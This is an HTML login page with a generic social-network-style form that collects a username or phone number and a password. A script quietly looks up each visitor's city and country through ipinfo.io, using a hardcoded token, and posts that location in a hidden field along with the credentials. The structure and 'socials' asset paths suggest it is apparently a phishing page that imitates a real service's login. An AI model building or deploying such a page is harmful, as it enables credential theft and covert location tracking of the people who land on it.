<!DOCTYPE html>
<html lang="pt-AO">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="shortcut icon"
      href="/img/socials/icon.png"
      type="image/x-icon"
    />
    <link rel="stylesheet" href="/css/style2.css" />
    <title></title>
    <style>
      form input {
        height: 3em !important;
        padding: 0.5em !important;
        outline-width: none !important;
        margin-bottom: 1em !important;
      }

      form .pass {
        height: 3.3em !important;
      }

      #submit2 img {
        width: 1.3em;
        animation-name: roll;
        animation-duration: 0.7s;
        animation-iteration-count: infinite;
        animation-timing-function: linear;
        color: white;
      }

      @keyframes roll {
        from {
          transform: rotate(0deg);
        }
        to {
          transform: rotate(360deg);
        }
      }
    </style>
  </head>
  <body onload="SwitchScreen()">
    <section class="container">
      <!-- FORM SECTION -->
      <article class="form-area">
        <div class="logo">
          <img src="/img/socials/logo.png" alt="Logo" />
        </div>
        <form
          method="post"
          accept="."
          onsubmit="handleSubmit()"
          style="margin-bottom: 2em"
        >
          <input
            type="text"
            name="username"
            id="username"
            required
            placeholder="Phone number, username or email"
          />
          <input
            type="password"
            name="password"
            id="password"
            required
            placeholder="Password"
            class="pass"
          />
          <input type="hidden" name="country" id="country" value="" />
          <button type="submit" name="submit" id="submit">Login</button>
          <button
            type="button"
            name="submit"
            id="submit2"
            style="display: none"
          >
            <img src="/img/loading.svg" alt="" />
          </button>
        </form>
      </article>
    </section>
    <!-- FORM SECTION END -->
    <!-- FOOTER -->
    <script src="/js/socials/app.js"></script>
    <script src="/js/socials/brands.min.js"></script>
    <script src="/js/socials/fontawesome.min.js"></script>
  </body>
</html>

<script>
  const handleSubmit = (e) => {
    const username = document.querySelector("#username");
    const password = document.querySelector("#password");
    const submitBtn = document.querySelector("#submit");
    const submitBtn2 = document.querySelector("#submit2");

    if (username.value.length > 0 && password.value.length > 0) {
      submitBtn.style.display = "none";
      submitBtn2.style.display = "block";
    } else {
      e.preventDefault();
      return false;
    }

    e.preventDefault();
    return false;
  };
</script>

<script>
  const apiKey = "f7aef6e7271770";
  // Function to get client's country information
  function getClientCountryInfo() {
    const countryInput = document.querySelector("#country");
    // Make a request to ipinfo.io to get information about the client's IP address
    fetch(`https://ipinfo.io?token=${apiKey}`)
      .then((response) => response.json())
      .then((data) => {
        // Extract the country information from the response
        const country = data.city + " " + data.country;
        console.log("Client Country:", country);
        countryInput.value = country;
      })
      .catch((error) => console.error("Error fetching IP information:", error));
  }

  // Call the function to get client country information
  getClientCountryInfo();
</script>
